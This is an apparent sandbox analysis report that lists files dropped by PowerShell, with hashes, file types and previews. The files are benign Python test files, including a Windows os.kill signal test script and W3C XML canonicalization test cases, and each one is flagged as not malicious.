                                                                                                                                                                                                                      SSDEEP:24:LypN6bjH3rBsDjcMdpXWzReiJK924QVsSQuQH6uMBHoCKM2AhORdxpzUm2ht4yyg:LY68/Lm9PK924QVsb3H6bBomJYNUB4U
                                                                                                                                                                                                                      MD5:D29AC53A92A553A789C812FDDE79F5F9
                                                                                                                                                                                                                      SHA1:02C091493C4E9B590161A030B8FB9CDA17BE2FEF
                                                                                                                                                                                                                      SHA-256:C61A9BD1A909AC12252FA53AD032FFF3506B9F08F6151FAB8AC670851AA5BC9C
                                                                                                                                                                                                                      SHA-512:8D6B845EC55FFB86CD0B49915BA3803A756325A0E6364EC09FEB8EE9CEADF18CAB3B11294D8E0C915249D1FAD221BD191D34BE27FBCD1845D12BDA4B13D75FB8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Script used to test os.kill on Windows, for issue #1220212....This script is started as a subprocess in test_os and is used to test the..CTRL_C_EVENT and CTRL_BREAK_EVENT signals, which requires a custom handler..to be written into the kill target.....See http://msdn.microsoft.com/en-us/library/ms685049%28v=VS.85%29.aspx for a..similar example in C..."""....from ctypes import wintypes, WINFUNCTYPE..import signal..import ctypes..import mmap..import sys....# Function prototype for the handler function. Returns BOOL, takes a DWORD...HandlerRoutine = WINFUNCTYPE(wintypes.BOOL, wintypes.DWORD)....def _ctrl_handler(sig):.. """Handle a sig event and return 0 to terminate the process""".. if sig == signal.CTRL_C_EVENT:.. pass.. elif sig == signal.CTRL_BREAK_EVENT:.. pass.. else:.. print("UNKNOWN EVENT").. return 0....ctrl_handler = HandlerRoutine(_ctrl_handler)......SetConsoleCtrlHandler = ctypes.windll.kernel32.SetConsoleCtrlHandler..SetConsoleCtrlHandle
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1906
                                                                                                                                                                                                                      Entropy (8bit):5.339180641393434
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:ZseJ7WHoJWHSWlsWWOSJuhrYJ/Es7439x3wEWmJC3t2zTHy:ZseJ7w4wSys6SJuhrYJ/TM3b3wQigzTS
                                                                                                                                                                                                                      MD5:067C61C778EB99EF54D45C5A623C4822
                                                                                                                                                                                                                      SHA1:944DBA6EEA150CF5941479F43C2331B263E59656
                                                                                                                                                                                                                      SHA-256:BB06864243355B1410322A56DA9A72CBD169FE2ABA99BC909C2751B48A6258BB
                                                                                                                                                                                                                      SHA-512:796AFD10B0FA6445BDABD0CFCFD2C009BA9AB6B108C5BF223E4FA54A2CCA2FAD45DD60089E1AE64F8F3EB0676A03FF4EB4898D70B520EEF2EBB698EFBB4A2725
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:C14N 2.0 test files..===================....This directory contains files from the draft note document listing..test cases for the W3C C14N 2.0 specification:..https://www.w3.org/TR/xml-c14n2-testcases/....Direct source:..https://www.w3.org/TR/xml-c14n2-testcases/files/....Copied and distributed under these terms:..https://www.w3.org/Consortium/Legal/2008/04-testsuite-copyright.html....Copyright . 2013 W3C. (MIT, ERCIM, Keio, Beihang),..All Rights Reserved.....Redistribution and use in source and binary forms, with or without..modification, are permitted provided that the following conditions..are met:....* Redistributions of works must retain the original copyright notice,.. this list of conditions and the following disclaimer...* Redistributions in binary form must reproduce the original copyright.. notice, this list of conditions and the following disclaimer in the.. documentation and/or other materials provided with the distribution...* Neither the name of the W3C nor the name
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):257
                                                                                                                                                                                                                      Entropy (8bit):5.062526860197769
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:tohLc4sCO20Lc4sSJ6nMl2mc4sSJkeDF3NuyOvNu8J5Oy:coWiKeOcQ
                                                                                                                                                                                                                      MD5:47214AC85BB440926A88296B7A02B5A0
                                                                                                                                                                                                                      SHA1:EAC1E67856E7F1561DF7A48F184CC549838DA824
                                                                                                                                                                                                                      SHA-256:8A53C429B7CB6B6563E7E661D9E215F0A6C561785CAC560B591724E1E28ADF91
                                                                                                                                                                                                                      SHA-512:7C553F8DB1876EAC7AF799165E8B0301642AB8F67A222CA52BAF45F50F14C4587185212032049435A2E8FB1F084B108CADB9FCC387EC7BA1A428B17BA1270CDF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<dsig:CanonicalizationMethod xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:c14n2="http://www.w3.org/2010/xml-c14n2" Algorithm="http://www.w3.org/2010/xml-c14n2">.. <c14n2:IgnoreComments>true</c14n2:IgnoreComments>..</dsig:CanonicalizationMethod>....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):158
                                                                                                                                                                                                                      Entropy (8bit):4.9785876488869265
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:I+dYsIF8C2wJS4RKbWOLCQMlYjmJS4RKbMfJkRBLU+dYsuyn:tohLc4sCO2Bl2mc4sSJknL5Oy
                                                                                                                                                                                                                      MD5:B260D6694D6D19E125F6A4C92C31E2B7
                                                                                                                                                                                                                      SHA1:23430641602AE8611AA3539720A3947A3C5533F4
                                                                                                                                                                                                                      SHA-256:80C6FECE1AA90C54BF1B88C5C15A40B0BE2CD711DE04594A5EE63A5664114C01
                                                                                                                                                                                                                      SHA-512:38C9A12A4684A9D6F7EF85020DF5048A52FF4D438C7BFC0C74567C5BFA854D2978B5D27837778F1387E98B35E7BEE3CF8723292D1DDC08D0FCB78FC83F50D6CA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<dsig:CanonicalizationMethod xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" Algorithm="http://www.w3.org/2010/xml-c14n2">..</dsig:CanonicalizationMethod>....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):261
                                                                                                                                                                                                                      Entropy (8bit):5.124878878336803
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:tohLc4sCO20Lc4sSJ6nMl2mc4sSJkeDFA9co7Q5Oy:coWiKeq9cok
                                                                                                                                                                                                                      MD5:A49404DA632C266E73206B8AFA7FF8BC
                                                                                                                                                                                                                      SHA1:C517E0FB2D6E920D87E52993664F7544AAA2C557
                                                                                                                                                                                                                      SHA-256:CBFD6BEADC30EDECD67279FE595CF7240405A2830090260A110CC0AE6ED0FC8C
                                                                                                                                                                                                                      SHA-512:ACB8D85C110AAA77844E002ACFC7209D25C80B89636AD70C6028A80F00D076A59881EE515D46E934F8AC873CA84D2FEFA52C9FCE4490D87D1E246DDFA940EF51
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<dsig:CanonicalizationMethod xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:c14n2="http://www.w3.org/2010/xml-c14n2" Algorithm="http://www.w3.org/2010/xml-c14n2">.. <c14n2:PrefixRewrite>sequential</c14n2:PrefixRewrite>..</dsig:CanonicalizationMethod>....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):393
                                                                                                                                                                                                                      Entropy (8bit):5.244390504173861
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:tohLc4sCO20Lc4sSJ6nMl2mc4sSJkC7A9co7b4zxrIEC3Vic4subiKuvA5Oy:coWiKC09coU7C38iC
                                                                                                                                                                                                                      MD5:20FA5C68A2A923F7D9DC8B844806A5BF
                                                                                                                                                                                                                      SHA1:B492EDD43960A196B8BCF943F985D58497364BB5
                                                                                                                                                                                                                      SHA-256:8BF883BF4D5FBB6189045D7F2B045F681FA9A4A6BCD32D1527B8647719A0DD9A
                                                                                                                                                                                                                      SHA-512:8E749CD7EE178643FE9389CE5DAE5A791AE95FEFAA21489E24CCA6DE70BE5F3EB84A36D280F4C9D0C615BA805586C484CA815470BA49733D6FC2EC855E8B28AB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<dsig:CanonicalizationMethod xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:c14n2="http://www.w3.org/2010/xml-c14n2" Algorithm="http://www.w3.org/2010/xml-c14n2">.. <c14n2:PrefixRewrite>sequential</c14n2:PrefixRewrite>.. <c14n2:QNameAware>.. <c14n2:QualifiedAttr Name="type" NS="http://www.w3.org/2001/XMLSchema-instance"/>.. </c14n2:QNameAware>..</dsig:CanonicalizationMethod>....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):438
                                                                                                                                                                                                                      Entropy (8bit):5.2507636436148335
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:tohLc4sCO20Lc4sSJ6nMl2mc4sSJkC7A9co7b4zxM8RfElN3VioOx0RRfYz3VicV:coWiKC09coU+8BYN3kGRBYz3ceb
                                                                                                                                                                                                                      MD5:1CDC6449F69411CCB1651E036626D80A
                                                                                                                                                                                                                      SHA1:551EE0058E79B9E9D884BF603BA3F2576491FB7B
                                                                                                                                                                                                                      SHA-256:011C04D25AEC5842E1F2796E60E0CBD60EED6B673C6B920889ACEABC233316A4
                                                                                                                                                                                                                      SHA-512:84563C6448210C0D590C05A95B285ABD0CF03A61239E615AF8FF62F367834252ED43B3F6533B9A4B21539F75F5977307F79DB8190288A57947F62FC26AE530C9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<dsig:CanonicalizationMethod xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:c14n2="http://www.w3.org/2010/xml-c14n2" Algorithm="http://www.w3.org/2010/xml-c14n2">.. <c14n2:PrefixRewrite>sequential</c14n2:PrefixRewrite>.. <c14n2:QNameAware>.. <c14n2:Element Name="bar" NS="http://a"/>.. <c14n2:XPathElement Name="IncludedXPath" NS="http://www.w3.org/2010/xmldsig2#"/>.. </c14n2:QNameAware>..</dsig:CanonicalizationMethod>....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):336
                                                                                                                                                                                                                      Entropy (8bit):5.206006857153659
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:tohLc4sCO20Lc4sSJ6nMl2mc4sSJkC74zxrIEC3Vic4subiKuvA5Oy:coWiKCQ7C38iC
                                                                                                                                                                                                                      MD5:2EBD9FA06F5DD5DC0AF41E17BC16B0FC
                                                                                                                                                                                                                      SHA1:6CFDC51A0E72A0658BEC3DBEB0199C8FADF366BD
                                                                                                                                                                                                                      SHA-256:99CB351EF51DB4DAB3B2090E5089A4E4DDAD11B609F812F5825C03C3594E015B
                                                                                                                                                                                                                      SHA-512:B539EB497CFA1DD9077562026DE670012FD6BD6A8F34722D8FD734BCBD2280F3007B60E825D15274C11E70403387AD0229A502C53AE7D24B102F7ADBF140DD69
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<dsig:CanonicalizationMethod xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:c14n2="http://www.w3.org/2010/xml-c14n2" Algorithm="http://www.w3.org/2010/xml-c14n2">.. <c14n2:QNameAware>.. <c14n2:QualifiedAttr Name="type" NS="http://www.w3.org/2001/XMLSchema-instance"/>.. </c14n2:QNameAware>..</dsig:CanonicalizationMethod>....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):296
                                                                                                                                                                                                                      Entropy (8bit):5.15858687084984
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:tohLc4sCO20Lc4sSJ6nMl2mc4sSJkC74zxM8RfElN3ViocA5Oy:coWiKCQ+8BYN3B
                                                                                                                                                                                                                      MD5:431CBA8A764EB21DD5F7652941EE2B54
                                                                                                                                                                                                                      SHA1:6BE7CA386DD2FB5E52CB696063D0DA0CE47916D0
                                                                                                                                                                                                                      SHA-256:9FAF0175BC12EDF95C24B6ABE2EDE6DC2597132230646F99371EA920854A4303
                                                                                                                                                                                                                      SHA-512:34AF14BE1050A0E0FA9A6DC8D399C89B8214BF0074A64127327EEF695DAB48C16D535E8336E37A09FD4D45966545F81242D1421DE150833C9D8798009B27AF58
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<dsig:CanonicalizationMethod xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:c14n2="http://www.w3.org/2010/xml-c14n2" Algorithm="http://www.w3.org/2010/xml-c14n2">.. <c14n2:QNameAware>.. <c14n2:Element Name="bar" NS="http://a"/>.. </c14n2:QNameAware>..</dsig:CanonicalizationMethod>....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):381
                                                                                                                                                                                                                      Entropy (8bit):5.213080227208619
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:tohLc4sCO20Lc4sSJ6nMl2mc4sSJkC74zxM8RfElN3VioOx0RRfYz3Vic4sSJMDv:coWiKCQ+8BYN3kGRBYz3ceb
                                                                                                                                                                                                                      MD5:9FD135DC1D27FF7340AF4A00E1B2513C
                                                                                                                                                                                                                      SHA1:932C74F6CA25335A1A96FB425EFB0E6102F3BF04
                                                                                                                                                                                                                      SHA-256:FE9E9B5AC66C392532F52D07647474E38667F9CB907A4086EC06795D6DE72E4B
                                                                                                                                                                                                                      SHA-512:D9E6D145D63E9180F9A4E320A596381346FB1CC0C456ECAEF791DF16B379827668810707A1527CC8844BDB2653EDEC5DCCB357418922F0D1D00F92B5308AC290
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<dsig:CanonicalizationMethod xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:c14n2="http://www.w3.org/2010/xml-c14n2" Algorithm="http://www.w3.org/2010/xml-c14n2">.. <c14n2:QNameAware>.. <c14n2:Element Name="bar" NS="http://a"/>.. <c14n2:XPathElement Name="IncludedXPath" NS="http://www.w3.org/2010/xmldsig2#"/>.. </c14n2:QNameAware>..</dsig:CanonicalizationMethod>....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):255
                                                                                                                                                                                                                      Entropy (8bit):5.1125612375837886
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:tohLc4sCO20Lc4sSJ6nMl2mc4sSJkeDFdce2cxoVce2cKO5Oy:coWiKeZ2cxs2cN
                                                                                                                                                                                                                      MD5:60DE265977E1458D76435E0BBDEE0BAA
                                                                                                                                                                                                                      SHA1:274D90EC600FA9003B433D9DFE0A9CF0FCC02E39
                                                                                                                                                                                                                      SHA-256:279B78CC14528080264A375D4FDEFED75C6E1BEBF92033672D8F937041AAC3DE
                                                                                                                                                                                                                      SHA-512:48B27002F6E04CAA5491005F5871F4BA8F9CB7B017E0A6FFC98C1645375F00E225D1F54C824BC89D5E6916840DA2400927EB88DDB3210D3B7A4BFFF85C15ABF6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<dsig:CanonicalizationMethod xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:c14n2="http://www.w3.org/2010/xml-c14n2" Algorithm="http://www.w3.org/2010/xml-c14n2">.. <c14n2:TrimTextNodes>true</c14n2:TrimTextNodes>..</dsig:CanonicalizationMethod>....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):74
                                                                                                                                                                                                                      Entropy (8bit):5.073789851881549
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:vFWWMNHU8LdgCfnpgouDXFHyD7wa:TMVBd/HuBSD8a
                                                                                                                                                                                                                      MD5:FA6F8F23253885327763A1DB86543A2B
                                                                                                                                                                                                                      SHA1:0B9E9B1F88142B2160C2B4730E13530A30E18A9B
                                                                                                                                                                                                                      SHA-256:B010E821E334A91549079025F2996470015967C78226546D20B69A120ED4A294
                                                                                                                                                                                                                      SHA-512:D2A6AEB0E86C457AB4BF16308F1616AC587B198A714EA963C69391079206B234B8BA4ED3DBF9F52F2E195029DE6BAE2EF319D867F503C8EE665A63A506F23A50
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8"?>....<!ELEMENT doc (#PCDATA)>........
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document text (XSL stylesheet), ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):158
                                                                                                                                                                                                                      Entropy (8bit):4.576368923570791
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:vFWWMNHUzCkcJzzvAXWQHUAFFgStRmJS4RKY9rlQRbduJzzKv:TMV0CkOvFS1sc4sQrur00
                                                                                                                                                                                                                      MD5:AEAB5829675803C49D40C6181CDD5973
                                                                                                                                                                                                                      SHA1:1207852B71B61B6B3F0CD3FD35FB4B254CA397C9
                                                                                                                                                                                                                      SHA-256:B2E83EF8726FA8DFA9778277930B39A32E0D10805FDAE3823349836A7CAE00F3
                                                                                                                                                                                                                      SHA-512:CA402B090B09D2ED733B1C9C2CDFC05669B119484FF3EAA359F746C658A9B9EE8944DD3201DC4418F4E1091551D1A4D0F7AF4AD08ABA36E6E6789FE07817974F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<?xml version="1.0"?>..<xsl:stylesheet version="1.0".. xmlns:xsl="http://www.w3.org/1999/XSL/Transform".. >..</xsl:stylesheet>..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):238
                                                                                                                                                                                                                      Entropy (8bit):4.940116789175569
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:TMV0zz53Q2ibYaydnQLBsvo6MtoKMMscJnF4M/RwMsy:TMGzFA2ikqLqvoDtnJhRUy
                                                                                                                                                                                                                      MD5:D8C541B9944E84CCB6B10270151CAAF0
                                                                                                                                                                                                                      SHA1:D3C792EBE1DB0491DACEFE6FFE641D4E2A85594B
                                                                                                                                                                                                                      SHA-256:4EA81760F654A8912BEA84F153DA83CC578119DBF6BB560740904C8E27271F99
                                                                                                                                                                                                                      SHA-512:A71D8D0A0EF85E7FBB34DD08A78B8C5790886FCAFF2F872CCBC607E1DA28F1BBA20775214C9CFF45E782AEE7C6902DC5792E18F4ECC2667BD0E29173C77826C6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<?xml version="1.0"?>....<?xml-stylesheet href="doc.xsl".. type="text/xsl" ?>....<!DOCTYPE doc SYSTEM "doc.dtd">....<doc>Hello, world! Comment 1 --></doc>....<?pi-without-data ?>.... Comment 2 -->.... Comment 3 -->..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):181
                                                                                                                                                                                                                      Entropy (8bit):3.5737382488145806
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:Qje1YFj6Bq0NBB5FjIbodFFFJ01YF/a8Bq0NBB5F/d/xckMBKXby:Me1YFj6gqxmodF/J01YF/a8gqtd/RMBv
                                                                                                                                                                                                                      MD5:326DB655758E459BF170F9A61DDB9B5E
                                                                                                                                                                                                                      SHA1:E28FB4192DDBF00328D98BC84BF44774B4C7ADC5
                                                                                                                                                                                                                      SHA-256:11D1266B26FD3F933B78F40C3BB3B5FC1446978D5C7BA7DCD5098B1C2810CA28
                                                                                                                                                                                                                      SHA-512:463B364DDB6F6B64E2BF8CD5A19CED879472FAC9A81087DAB7995235A580264B79DAA24214A29813522BB1D576CA74905EEB44BFA550F6DE95192D4B78524BBD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<doc>.. <clean> </clean>.. <dirty> A B </dirty>.. <mixed>.. A.. <clean> </clean>.. B.. <dirty> A B </dirty>.. C.. </mixed>..</doc>..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:exported SGML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):590
                                                                                                                                                                                                                      Entropy (8bit):4.717703613733785
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:zvdbgD1SZnD/Rp1jVRjgojErTQbE2oD35nrfd4hjnrKnxbofINHhQ:zlbgIZD/Rp1jVRdqEA2OpupedTZhQ
                                                                                                                                                                                                                      MD5:3DA1951E67F913EBC3EFBF2C6818FB98
                                                                                                                                                                                                                      SHA1:03B234AD2FB75950F25F2B43FD72ADFE1AB21F1B
                                                                                                                                                                                                                      SHA-256:0C50E2BB8A7CFC6D5D7C626DBDCD00E4B8A682E6BAAD9E3D5321CE31E43AAB1D
                                                                                                                                                                                                                      SHA-512:D5A220C8C79523951D42C0989496856AF91C69348F1181DA61D4983042BEA07C71B7731A282B9B1CE8C988CCDE2FE93AB0DB5F43096EA8A6F1B78AB312A8F084
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<!DOCTYPE doc [<!ATTLIST e9 attr CDATA "default">]>..<doc>.. <e1 />.. <e2 ></e2>.. <e3 name = "elem3" id="elem3" />.. <e4 name="elem4" id="elem4" ></e4>.. <e5 a:attr="out" b:attr="sorted" attr2="all" attr="I'm".. xmlns:b="http://www.ietf.org".. xmlns:a="http://www.w3.org".. xmlns="http://example.org"/>.. <e6 xmlns="" xmlns:a="http://www.w3.org">.. <e7 xmlns="http://www.ietf.org">.. <e8 xmlns="" xmlns:a="http://www.w3.org">.. <e9 xmlns="" xmlns:a="http://www.ietf.org"/>.. </e8>.. </e7>.. </e6>..</doc> ..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:exported SGML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):529
                                                                                                                                                                                                                      Entropy (8bit):5.222021526888757
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:YHRRKS29bme0X4g9MGZAoWc4pgYR2RRD5RmHhwu:GRz29bmemRiGGc4pj2RhPmBwu
                                                                                                                                                                                                                      MD5:1B3B6157CC9F19C8AD432A27D76232BD
                                                                                                                                                                                                                      SHA1:80040A82040217F1E2417FC00CEF5C47552BCDD9
                                                                                                                                                                                                                      SHA-256:DE65A1A9A92A2A5E468F04AE3DC0064A87F13450A218D6B906F629D1373ED251
                                                                                                                                                                                                                      SHA-512:A049F2170D931A6A98A465E09E3DD165C1B36FC008682BACFD409B306464D17A06B418E1CF635198AF1699E675747DA880694312D8E5B6FFCA5C6EFF65D57D24
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<!DOCTYPE doc [..<!ATTLIST normId id ID #IMPLIED>..<!ATTLIST normNames attr NMTOKENS #IMPLIED>..]>..<doc>.. <text>First line&#x0d;&#10;Second line</text>.. <value>&#x32;</value>.. <compute><![CDATA[value>"0" && value<"10" ?"valid":"error" </compute>.. <compute expr='value>"0" &amp;&amp; value&lt;"10" ?"valid":"error"'>valid</compute>.. <norm attr=' &apos; &#x20;&#13;&#xa;&#9; &apos; '/>.. <normNames attr=' A &#x20;&#13;&#xa;&#9; B '/>.. <normId id=' &apos;&#x20;&#13;&#xa;&#9; &apos; '/>..</doc>..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:exported SGML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):327
                                                                                                                                                                                                                      Entropy (8bit):5.184479675613137
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:6pyWyD9RavbOXHF1kxkBqc2v1FjLIALyKKXbr0TcBlI+LJxigLftA:cyWjKIkMc29Fn9ZwgwRLJEgu
                                                                                                                                                                                                                      MD5:92934DB8AC08BE66330C2DB2F2E637D9
                                                                                                                                                                                                                      SHA1:4800F2233DE601D61FCD489267103C1AEBFD8A10
                                                                                                                                                                                                                      SHA-256:9DCBA95688AEFA2FE5AB8C530FBE12A1848B5B0DA1C789893D3186FE9EDBBC17
                                                                                                                                                                                                                      SHA-512:E9272DA14A5139E3A1DE60CA7076951C3AD95093C9F159395019EDD291B1292941061CB8998779BA4E07D8BA7A5EA047358C053514CB468FB75BD940277E7CDC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<!DOCTYPE doc [..<!ATTLIST doc attrExtEnt CDATA #IMPLIED>..<!ENTITY ent1 "Hello">..<!ENTITY ent2 SYSTEM "world.txt">..<!ENTITY entExt SYSTEM "earth.gif" NDATA gif>..<!NOTATION gif SYSTEM "viewgif.exe">..]>..<doc attrExtEnt="entExt">.. &ent1;, &ent2;!..</doc>.... Let world.txt contain "world" (excluding the quotes) -->..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                                                                      Entropy (8bit):4.991729296672176
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:vFWWMNHU8LdgCopgGbz08Gu:TMVBdIpgGbz0e
                                                                                                                                                                                                                      MD5:87C9D07A8020158D8D0C41E5280D4A5D
                                                                                                                                                                                                                      SHA1:E987A5B1D0773E54CD741D5D1A398D10606A2B47
                                                                                                                                                                                                                      SHA-256:7BD47E9477149E6DBBD3F43E8838722FD63BA9FFABC07EF5910A91E099903258
                                                                                                                                                                                                                      SHA-512:B53DF497C9ED4C6DB6489356D584E3D444967F074527053E7F5BB521CC7460AD0011857818D2B309E1BBDC126AF0E69B7DCC93EB0F2AF93BF698FFFCD39A22A0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="ISO-8859-1"?>..<doc>&#169;</doc>..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):372
                                                                                                                                                                                                                      Entropy (8bit):5.112063058917926
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:0IgNAUCcHn0mIHiUUnWboo+ic4s1ozF62EJsHObc4sSJMAiIXwBuQRPG1tHcu:Dg5H0mIH/6izBWsHEeAiam4HHcu
                                                                                                                                                                                                                      MD5:2BDE1BCE8FEE6CEDC3B599E9C3F46C0F
                                                                                                                                                                                                                      SHA1:3AB484904BBA96B380695C2E16E5403EAC4B069C
                                                                                                                                                                                                                      SHA-256:179EF2940718A065A3D83F880C073878F47F46E31CFC5326452F306BA4D2055B
                                                                                                                                                                                                                      SHA-512:E11EBC503799C7FA287B2573E587D09A5C3362C22626E5E6DF77F6B88408AFAFE2D2EE89AFDA21AEE0D5344653175E2CBFFB0E7FB76BF88751A3E7A82BB09675
                                                                                                                                                                                                                      Malicious:false
